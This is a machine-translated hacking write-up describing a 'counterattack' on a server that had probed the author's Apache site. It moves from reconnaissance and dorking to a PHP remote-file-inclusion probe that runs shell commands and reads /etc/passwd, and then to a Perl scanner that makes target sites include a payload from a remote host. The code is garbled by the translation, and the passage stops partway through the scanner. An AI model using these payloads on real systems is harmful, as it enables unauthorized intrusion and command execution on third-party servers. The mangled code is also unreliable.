Reverse osmosis forensics

Reprinted fromXiliaoxixiFinal editingZero x 255

From: Tiger I. Cause One day, IDS sends an alert and apache is under attack. Although it was not successful, it cannot be so. I have to see which kind of 'fairy 'dares to move on the Earth at the age of too. Ii. counterattack According to the source IP detection, only ports 22 and 80 are opened. It can be seen that the other side is also a web server, which is likely a stepping stone. In any case, take it first! Generally, a web server has multiple virtual spaces, which makes it difficult to ensure that the code of each website is secure. Therefore, for servers with multiple websites, it is almost easy to get a webshell. 1. Spying Google is certainly used for spying on website information. First comeWww.myipneighbors.comQuery the domain name corresponding to the server IP address; Use google to search for inurl: domain.com and check the obtained pages one by one. But there are too many domain names corresponding to this IP address. According to the attack method of the IP address, it seems to be looking for the RFI (remote file include) vulnerability. OK. If this server is a stepping stone, it may also be attacked due to the RFI vulnerability. Let's start with the RFI vulnerability. Put all the server URLs collected by google into a text file. Then we can quickly detect these links through programs. Not much nonsense. Go to the Code: 1. Rfi.txt This is actually a php code. You can use this code to test whether the php script of the target website will execute this code. <? Php // Through the unpack function of php, if 2a73637266621374392a is output on the page, the php code is executed! $ Pcode = unpack (H *, * scrfcxt9 *); Echo $ pcode [1]; // Phpinfo (); Echo <br>; // Run the ls/et */pas * d command. If/etc/passwd is returned, the php code can execute the system command. Echo execute ("ls/et */pas * d "); // The phpspy code is used here, so I am too lazy to write it. That is to say, a function that calls php to execute system commands one by one. If any function succeeds, it is used for execution. Function execute ($ cfe ){ $ Res =; If ($ cfe ){ If (function_exists (exec )){ @ Exec ($ cfe, $ res ); $ Res = join ("", $ res ); } Elseif (function_exists (shell_exec )){ $ Res = @ shell_exec ($ cfe ); } Elseif (function_exists (system )){ @ Ob_start (); @ System ($ cfe ); $ Res = @ ob_get_contents (); @ Ob_end_clean (); } Elseif (function_exists (passthru )){ @ Ob_start (); @ Passthru ($ cfe ); $ Res = @ ob_get_contents (); @ Ob_end_clean (); } Elseif (@ is_resource ($ f = @ popen ($ cfe, "r "))){ $ Res =; While (! @ Feof ($ f)){ $ Res. = @ fread ($ f, 1024 ); } @ Pclose ($ f ); } } Return $ res; } ?> 2. Rfiscan. pl This is a batch detection code that allows you to quickly locate vulnerability URLs. #! /Usr/bin/perl-w Use LWP: Simple; # use lwp to obtain url content and determine Use Parallel: ForkManager; # use forkmanager for fast multi-thread execution $ | = 1; My $ urlfile = shift | die need list !; My @ urllist; My $ Forkno = 100; My $ count = 0; # Set Remote File Inclusion location My $ phpurl = 'HTTP: // www.mysite.com/rfc.txt? '; My $ stime = time; # Open a url list file Open (URLL, "$ urlfile"